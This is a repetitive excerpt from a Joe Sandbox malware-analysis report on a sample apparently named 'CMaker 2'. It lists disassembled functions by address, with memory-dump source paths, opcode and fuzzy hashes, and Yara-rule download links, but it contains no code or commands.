                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0008bd1e1cf4034a66eb42e07a3a65e84d8b36ac551103fbdda68f9474da116d
                                                                                                                                                                                  • Instruction ID: 3af5aa33f50411a870d72b7a75006dc75f635fce21f7e6bfa669e69432ab7a5b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0008bd1e1cf4034a66eb42e07a3a65e84d8b36ac551103fbdda68f9474da116d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83D1C83EA0864246EB68CEA9855027D27A0FF46B48F9C42BDCE2D876D5EF3DD855C340
                                                                                                                                                                                  Function 00007FF6FABE7C70 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3ac8ee90bb6b617b5b319db632e98c0af2178e83a843fb21159c5a1526b6f998
                                                                                                                                                                                  • Instruction ID: c5ad7ca386e7fe117eb504e68459b32b8e9b91f3e534a26b82db8d3565951f5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ac8ee90bb6b617b5b319db632e98c0af2178e83a843fb21159c5a1526b6f998
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC1A6722181E08BD389EB29E4A947A73E1F78A34DBD4406BEB87477C5DA3CE514D710
                                                                                                                                                                                  Function 00007FF6FABF12C0 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3e5cfbf483404f57ee8a12ea4d14ed350c4223dc86507dd0048c0f0f8d20af82
                                                                                                                                                                                  • Instruction ID: a3b6d155d88739935d3f9c2fac025dbd75ab1682d250e9355e28b51ad3c780cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5cfbf483404f57ee8a12ea4d14ed350c4223dc86507dd0048c0f0f8d20af82
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07B18B7AA0864685E7648F79E05027D3BA0EB46B48F9C45BDCB5E873D9EF39E440CB10
                                                                                                                                                                                  Function 00007FF6FABF1658 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d13b51d7cebc5a28311f111b9e128a6e63b06b12873bb9f0d627f9558e9a6c03
                                                                                                                                                                                  • Instruction ID: 579de4745d285ed65ff4ffe7a59caee7a6db6c437564cba28b79ae65025a8fc1
                                                                                                                                                                                  • Opcode Fuzzy Hash: d13b51d7cebc5a28311f111b9e128a6e63b06b12873bb9f0d627f9558e9a6c03
                                                                                                                                                                                  • Instruction Fuzzy Hash: EBB1AE7AA0878585E7648F79E05023C3BA0EB4AB48FAC45B9CB5E877D5EF39E441C740
                                                                                                                                                                                  Function 00007FF6FABFE3B8 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c0bd77ba3b70669da09b487a0ea8a9d1258efaa5b8366dc8ff5dd73dfcf56369
                                                                                                                                                                                  • Instruction ID: 9b3efb420d4fe32524e46270a3ea663f1ded9a3e2f21f9692423c80ce4b2ccef
                                                                                                                                                                                  • Opcode Fuzzy Hash: c0bd77ba3b70669da09b487a0ea8a9d1258efaa5b8366dc8ff5dd73dfcf56369
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF81E576A0C7818AE774CB59944037D7A91FB86794F98427DDAAD83BD9EF3DE4008B00
                                                                                                                                                                                  Function 00007FF6FAC06500 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: dafa21fd323fba1ffdb82202de70c6ebe6d7ee83da844ca0b8fe7320dd75a47a
                                                                                                                                                                                  • Instruction ID: 58e0b52633aa0b05796ff3c8142fb9038377aae6fc3ba7cfb9bc91ff3ffd6fbf
                                                                                                                                                                                  • Opcode Fuzzy Hash: dafa21fd323fba1ffdb82202de70c6ebe6d7ee83da844ca0b8fe7320dd75a47a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B610DB6F1C24286FB648E2C845427D66A2AF41770F1496B9D7BDC26D5FEFDE8008700
                                                                                                                                                                                  Function 00007FF6FABF01CC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                  • Instruction ID: a06c40d529e681c61668b9c674887fe0dd76156fbde95dd23102874644b77d2c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6551B63AA18A5186E7648B69C04023C33A0FB4AB58F684179CE5D977E5FF3AE943C750
                                                                                                                                                                                  Function 00007FF6FABEFDBC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                  • Instruction ID: d6a156add11b534346477a7d228d4ab7531c9d5105fccb990107e3b4929d9b24
                                                                                                                                                                                  • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                  • Instruction Fuzzy Hash: C751C736A19A5186E7248B39C08423833A0EB46F69FA441B1DE5D977D5EF3AFC43C790
                                                                                                                                                                                  Function 00007FF6FABF05DC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                  • Instruction ID: 2fa4a86de8f34c776efe0c5f8b13aa78b07f2abfc2517985ec9fe367a97ce214
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A51D93AA1865182E7248B69C44023873A0EB86F58F685179CE6C877F5FF3AEC43C740
                                                                                                                                                                                  Function 00007FF6FABEFBB8 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                  • Instruction ID: dce74b6ce5819e4cefdf5d0316a24c0d456e68e791763b7da169fc2c331006bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51A376A18A5586E7248F39C08423837A0EB46B59FB481F1CE5D877E4EF3AE853C750
                                                                                                                                                                                  Function 00007FF6FABF03D8 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                  • Instruction ID: 5fd6b73f9fa2675b95e3cdab6af20f6f88628e8e4c3de4e1c1f175a38b9795e4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4251A17AA1865186E7248B69C04023D37B0EB4AB58FAC5179CE5C977F4FF3AE852C740
                                                                                                                                                                                  Function 00007FF6FABEFFC8 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                  • Instruction ID: 950ef888572de9b53f217116c839f818936750094f3fc4604f5f84c01a7f1020
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D451D33AA1865586EB248B68C04023937A0EB46B58F684179DE5D877F4FF3AED43D780
                                                                                                                                                                                  Function 00007FF6FABF5B50 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                  • Instruction ID: e7af746d7580ef54ffe8b96a731619b1a88d3fca2074d6a1c52b8006a6954372
                                                                                                                                                                                  • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9141935A80D64A06EB958D9845106B82688AF23BA0FDC53FCDDBBD33C3ED1D65D7C200
                                                                                                                                                                                  Function 00007FF6FABF9AA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                  • Opcode ID: 6e7531a28f25f8c3b2f3f11a6ce53f43a5e2fd9c2c8f795175ae5b8f39881432
                                                                                                                                                                                  • Instruction ID: 8434592679439ca453526ed9f29feaab856b82b68cb4e66278845c1943a64791
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e7531a28f25f8c3b2f3f11a6ce53f43a5e2fd9c2c8f795175ae5b8f39881432
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E412476718A5582EF08CF6AD914579B3A1FB49FC0B48A436EE1DD7B98EE3DD0428300
                                                                                                                                                                                  Function 00007FF6FABF7C98 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3bc4cc9b189c3d63146a2f8633e9bae6a6789799e533dea34e92803710407a17
                                                                                                                                                                                  • Instruction ID: 2823712ebc9869445b02e66824cd4e87ca45540f3bcecfb1c2f5d9e154073789
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bc4cc9b189c3d63146a2f8633e9bae6a6789799e533dea34e92803710407a17
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA31077A719B8242EB14DF65A44017E66E4AF85B90F4842BCEA6DD3BD6EF3CD0128704
                                                                                                                                                                                  Function 00007FF6FAC09650 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
